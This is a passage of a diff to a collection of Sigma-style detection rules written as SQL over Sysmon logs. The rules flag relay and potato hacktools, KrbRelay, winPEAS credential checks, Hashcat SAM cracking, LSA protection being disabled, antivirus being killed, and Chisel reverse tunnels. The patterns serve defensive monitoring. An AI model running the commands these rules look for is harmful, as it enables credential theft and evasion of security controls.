aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_powershell_add_windows_capability.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "Use of FSharp Interpreters", + "id": "b96b2031-7c17-4473-afe7-a30ce714db29", + "status": "experimental", + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" + "attack.t1059" ], "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "Legitimate use by a software developer." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR Image LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Service StartupType Change Via PowerShell Set-Service", - "id": "62b20d44-1546-4e61-afce-8e175eb9473c", + "title": "Using AppVLP To Circumvent ASR File Path Rule", + "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "status": "experimental", - "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Application Virtualization Utility is included with Microsoft Office. 
We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "author": "Sreeman", "tags": [ - "attack.execution", + "attack.t1218", "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_set_service_disabled.yml" + "filename": "proc_creation_win_lolbin_appvlp.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "status": "experimental", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "Potential SMB Relay Attack Tool Execution", + "id": "5589ab4f-a767-433c-961d-c91f3f704db1", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Legitimate files with these rare hacktool names" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%PetitPotam%' ESCAPE '\\' OR Image LIKE '%RottenPotato%' ESCAPE '\\' OR Image LIKE '%HotPotato%' ESCAPE '\\' OR Image LIKE '%JuicyPotato%' ESCAPE '\\' OR Image LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR Image LIKE '%Juicy Potato%' ESCAPE '\\' OR Image LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((Image LIKE '%HotPotatoes6%' ESCAPE '\\' OR Image LIKE '%HotPotatoes7%' ESCAPE '\\' OR Image LIKE '%HotPotatoes %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, { - "title": "Suspicious Userinit Child Process", - "id": "b655a06a-31c0-477a-95c2-3726b83d649d", - "status": "test", - "description": "Detects a suspicious child process of userinit", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", + "title": "HackTool - winPEAS Execution", + "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "status": "experimental", + "description": 
"WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "author": "Georg Lauenstein (sure[secure])", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'winPEAS.exe' OR (Image LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_userinit_child.yml" + "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Suspicious Execution of Shutdown", - "id": 
"34ebb878-1b15-4895-b352-ca2eeb99b274", - "status": "test", - "description": "Use of the commandline to shutdown or reboot windows", - "author": "frack113", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_execution.yml" + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Psexec Execution", - "id": "730fc21b-eaff-474b-ad23-90fd265d4988", - "status": "test", - "description": "Detects user accept agreement execution in psexec commandline", - "author": "omkar72", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "status": "experimental", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.t1569", - "attack.t1021" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ - "Administrative scripts." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexec_execution.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { - "title": "Potential Discovery Activity Via Dnscmd.EXE", - "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "status": "experimental", - "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. 
DNS zones used to host the DNS records for a particular domain.", - "author": "@gott_cyber", + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "status": "test", + "description": "Detects Archer malware invocation via rundll32", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administration use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dnscmd_discovery.yml" + "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Use of OpenConsole", + "id": "814c95cc-8192-4378-a70a-f1aafd877af1", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by an administrator" ], - "level": "high", + 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'OpenConsole.exe' OR Image LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_openconsole.yml" }, { - "title": "Gpresult Display Group Policy Information", - "id": "e56d3073-83ff-4021-90fe-c658e0709e72", - "status": "experimental", - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "author": "frack113", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gpresult_execution.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Remote Access Tool - NetSupport Execution From Unusual Location", - "id": "37e8d358-6408-4853-82f4-98333fca7014", - "status": "experimental", - "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", + "status": "stable", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Legitimate setups that use similar flags" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR 
OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious ZipExec Execution", + "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "author": "frack113", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.005" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" ], - "filename": 
